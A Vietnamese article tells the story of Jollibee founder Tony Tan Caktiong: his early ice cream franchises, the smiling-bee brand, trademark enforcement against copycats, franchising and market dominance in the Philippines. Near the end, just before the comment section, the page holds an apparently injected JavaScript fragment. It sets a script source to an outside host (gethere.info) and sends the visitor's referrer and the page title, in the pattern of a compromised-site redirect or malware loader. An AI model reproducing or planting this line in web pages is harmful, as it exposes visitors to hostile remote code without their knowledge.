Câu chuyện cuộc đời Tony Tan Caktiong – từ một chàng thanh niên bán kem trở thành ông chủ đế chế thức ăn nhanh huyền thoại

“Từ khởi đầu đầy khiêm tốn vươn lên đỉnh cao thế giới” là những từ xúc tích nhất để tóm gọn lại câu chuyện cuộc đời của Tony Tan Caktiong, hiện đang là chủ tich và CEO của công ty cổ phần thực phẩm Jollibee, chuỗi nhà hàng thức ăn nhanh lớn nhất Philippines.

Tony-Tan-Caktiong-Jollibee (1)

Sinh ra trong một gia đình nghèo khó di cư từ miền Đông Nam Trung Quốc sang Philippines với mong muốn thoát khỏi cảnh cơ cực, có được một cuộc sống tốt đẹp hơn, anh đã bắt tay vào công việc kinh doanh nhà hàng từ khi còn rất trẻ, khi mà cha anh cũng bắt đầu mở một nhà hàng. Với sự giúp đỡ của toàn bộ gia đình, nhà hàng đó đã đem lại thu nhập và điều đó đã giúp Caktiong có thể đủ tiền theo học chuyên ngành kĩ sư hóa học tại Manila.

Vào năm 22 tuổi, trong một lần đi thăm nhà máy kem, anh  đã vô cùng thích thú và bắt đầu chính thức đặt chân vào lĩnh vực kinh doanh nhà hàng: dựa vào số tiền tiết kiệm của gia đình, anh đã nắm lấy cơ hội nhượng quyền thương mại của hãng kem Magnolia Dairy và mở hai cửa hàng kem. Đáp ứng nhu cầu của khách hàng, anh đã thêm các món nóng và sandwiches vào thực đơn, và những món đó đã được minh chứng thực tế rằng chúng còn được ưa thích hơn cả kem. Ba năm sau đó, vào năm 1978, anh đã quyết định tận dụng sự phát triển này, ngưng việc nhượng quyền thương hiệu Magnolia và chuyển sang kinh doanh chi nhánh thức ăn nhanh.

Nhãn hiệu và thương hiệu:

Nhận ra rằng cần có tên thương hiệu và logo cho doanh nghiệp mới của mình, Caktiong và gia đình của anh đã quyết định sử dụng hình ảnh một con ong đỏ đang mỉm cười. Họ chọn hình tượng con ong bởi nó gợi liên tưởng tới sự chăm chỉ và bởi vì mật ong đại diện cho những điều ngọt ngào trong cuộc sống. Cụm từ “jolly” được đặt lên phía trước có ý nghĩa bao hàm cho sự vui vẻ, hạnh phúc. Jollibee đã đầu tư hàng triệu pesos để đăng kí thương hiệu “ bee – con ong” ở Philippines và các quốc gia khác.

Tony-Tan-Caktiong-Jollibee (1)

Tony-Tan-Caktiong-Jollibee (3)

Cùng với chiến lược quảng cáo và marketing thông minh, thương hiệu này đã đánh trúng tâm lý người dân. Theo Caktiong chia sẻ thì từ một thương hiệu khá thô sơ với hình ảnh chú ong lạ lẫm, không một ngân hàng nào dám đầu tư vào năm 1978, Jollibee và nụ cười luôn thường trực trên môi, giờ đây đã trở thành một thương hiệu khét tiếng, một câu chuyện thành công đích thực của Philippines và được coi như niềm tự hào dân tộc. Tính đến thời điểm hiện tại thương hiệu, Jollibee đã có tài sản lên tới vài tỉ pesos.

Tony-Tan-Caktiong-Jollibee (1)

Theo như Caktiong giải thích thì nhãn hiệu đã giúp tăng giá trị doanh nghiệp lên rất nhiều lần. Đối vói khách hàng, họ thể hiện niềm tin với công ty hoặc niềm tin với thương hiệu vì những món ăn độc đáo, ngon miệng, những trải nghiệm về không gian, dịch vụ, và tất nhiên họ cũng sẽ tự hào khi trở thành một phần đóng góp xây dựng nên thương hiệu này.

Ngày nay, tập đoàn chế biến thực phẩm Jollibee đã sử dụng 8 thương hiệu độc quyền (bao gồm “Jollibee” cho doanh nghiệp thức ăn nhanh cốt lõi, “Greenwich” cho chuỗi cửa hàng pizza và mỳ ống, và “Chowking” cho chi nhánh thực phẩm Á Đông của họ), sở hữu nhiều nhãn hiệu ( bao gồm “Bee Happy”, “Yumburger” , “Chickenjoy” và “Amazing Aloha”) đồng thời cũng đã đăng kí logo cho tất cả nhãn hiệu đó.

Bảo vệ thương hiệu và thực thi pháp luật:

Tên thương hiệu Jollibee  và những ý nghĩa tích cực của nó biến thành mục tiêu cho những kẻ chuyên nhái thương hiệu. Caktiong nói rằng ông đã từng gặp rất nhiều nơi bán quần áo hoặc giầy dép cũng lấy thương hiệu “Jollibee”. Ở nhiều nước, họ còn mở một cửa hàng thức ăn nhanh lấy tên “Jollibee”, thậm chí sử dụng cùng một bản vẽ.

Ý thức được tầm quan trọng của việc bảo vệ thương hiệu, tập đoàn chế biến thực phẩm Jollibee đã có biện pháp đối với những hành vi xâm phạm thương hiệu. Anh nhấn mạnh rằng nếu không có biện pháp ngăn chăn những hành động này, thương hiệu sẽ dần bị bão hòa theo thời gian. Mặt khác anh cũng ý thức sâu sắc rằng việc nhái thương hiệu sẽ ảnh hưởng tới toàn bộ nền kinh tế xã hội, làm ảnh hưởng tới sức khỏe khách hàng bởi những thương hiệu giả này sẽ không có trách nhiệm với những hành vi của mình, điều này dẫn đến việc khách hàng hoang mang, mất niềm tin vào các thương hiệu lớn, mọi quy tắc xã hội sẽ bị phá vỡ.

Nhượng quyền kinh doanh:

Tập đoàn chế biến thực phẩm Jollibee tin tưởng vào mô hình nhượng quyền kinh doanh thông qua việc khai thác một nửa số chi nhánh Philippines. Để bảo vệ chất lượng phục vụ cũng như thực phẩm của công ty, các chuỗi cửa hàng tiềm năng phải đáp ứng những yêu cầu cụ thể (doanh nhân tự định hướng, sở hữu những kĩ năng quản lý, kĩ năng giao tiếp và ứng xử trước cộng đồng tốt)

Kết quả kinh doanh của doanh nghiệp:

Jollibee là nhà hàng thức ăn nhanh nổi tiếng nhất Philippines. Kể từ khi thành lập vào những năm cuối thập kỉ 70, tập đoàn chế biến thực phẩm Jollibee đã phát triển một cách ngoạn mục: Ngày nay, Jollibee đã chiếm được hơn 50% thị phần tại Philippines và sở hữu hàng trăm nhà hàng trên toàn đất nước.

Tony-Tan-Caktiong-Jollibee (1)

Bảo vệ thương hiệu thông qua việc đăng kí thương hiệu quốc gia và quốc tế đã đóng vai trò đáng kể trong thành công của Jollibee – nhưng nếu không có một thương hiệu nổi tiếng cùng với chất lượng dịch vụ và chất lượng thực phẩm cao, sẽ rất khó cho Jollibee để chinh phục thị trường thức ăn nhanh đầy cạnh tranh. “Sở hữu trí tuệ đang trở nên rất quan trọng bởi bạn phải khiến mình khác với những đối thứ xung quanh – đó là một thị trường vô cùng cạnh tranh trong đó bạn cần tạo ra một thứ thật đặc biệt”, Caktiong đã kết luận.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận